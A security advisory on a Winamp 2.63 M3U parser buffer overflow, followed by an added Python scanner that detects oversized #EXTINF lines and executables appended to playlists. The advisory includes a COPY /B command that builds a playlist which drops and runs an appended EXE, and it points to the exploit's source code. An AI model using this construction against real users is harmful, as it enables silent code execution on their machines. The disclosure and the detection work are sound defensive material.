Vulnerability: WinAmp

Affected: Winamp 2.63

Description: 'ByteRage' found the following. He has written a full-disclosure buffer overflow exploit for the Winamp 2.63 buffer overflow found in the M3U file parser. Attached is a file called DROPPER.M3U; if you execute the following command in DOS:

COPY /B DROPPER.M3U+C:\WINDOWS\CDPLAYER.EXE HACKME.M3U

When you click HACKME.M3U, the file will drop and execute the appended EXE file, CDPLAYER.EXE in this case. The C++ source for creating DROPPER.M3U is at http://elf.box.sk/byterage/wa263bof.cpp and more info can be found at http://elf.box.sk/byterage/wa263.htm. This hasn't been tested yet on 2.64 or earlier versions, but if the versions of IN_MOD.DLL match, those versions are vulnerable too.

[Attachment: dropper.m3u (application/octet-stream, base64-encoded, Content-MD5 Kjxu6Ci/fHfAvxuamfKQrA==); the encoded blob is not reproduced here.]

Solution: After checking the whatsnew.txt for Winamp, this security hole was patched in version 2.65.
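The advisory describes two things a defender can look for in a playlist file: an oversized #EXTINF line feeding the vulnerable M3U parser, and an executable glued onto the playlist with COPY /B. The scanner below, an added example that is not part of the original advisory or ByteRage's code, applies both heuristics to raw M3U bytes; the length limits and the constructed sample files are assumptions made for this example.

```python
import struct

# Heuristic limits chosen for this example (assumptions, not values from the advisory).
MAX_EXTINF_LEN = 256   # "#EXTINF:seconds,title" lines are normally short
MAX_LINE_LEN = 1024    # any playlist line longer than this is suspect on its own
TEXT_OK = set(b"\t") | set(range(0x20, 0x100))  # high bytes allowed for non-ASCII titles


def _pe_offset(data: bytes) -> int:
    """Offset of an embedded PE image (an 'MZ' header whose e_lfanew points at 'PE\\0\\0'), or -1."""
    pos = data.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(data):
            e_lfanew = struct.unpack_from("<I", data, pos + 0x3C)[0]
            if data[pos + e_lfanew: pos + e_lfanew + 4] == b"PE\0\0":
                return pos
        pos = data.find(b"MZ", pos + 1)
    return -1


def scan_m3u(data: bytes) -> list:
    """Return human-readable findings for one M3U file body; an empty list means nothing suspicious."""
    findings = []
    pe = _pe_offset(data)
    if pe != -1:
        findings.append(f"PE executable image appended at offset {pe}")
    # Only the text before any appended executable is treated as playlist content.
    text = data if pe == -1 else data[:pe]
    for num, line in enumerate(text.splitlines(), 1):
        if len(line) > MAX_LINE_LEN:
            findings.append(f"line {num}: {len(line)} bytes, exceeds {MAX_LINE_LEN}")
        elif line.startswith(b"#EXTINF:") and len(line) > MAX_EXTINF_LEN:
            findings.append(f"line {num}: #EXTINF field of {len(line)} bytes")
        bad = [b for b in line if b not in TEXT_OK]
        if bad:
            findings.append(f"line {num}: {len(bad)} non-text byte(s), e.g. 0x{bad[0]:02x}")
    return findings


# Constructed samples: an ordinary playlist, and a look-alike of a dropper made of an
# oversized #EXTINF line followed by a minimal MZ/PE header stub (not a real executable).
BENIGN = b"#EXTM3U\r\n#EXTINF:213,Artist - Song\r\nC:\\Music\\song.mp3\r\n"
_STUB = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40) + b"PE\0\0"
SUSPECT = b"#EXTM3U\r\n#EXTINF:" + b"X" * 600 + b"\r\n" + _STUB

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, scan_m3u(sample) or ["clean"])
```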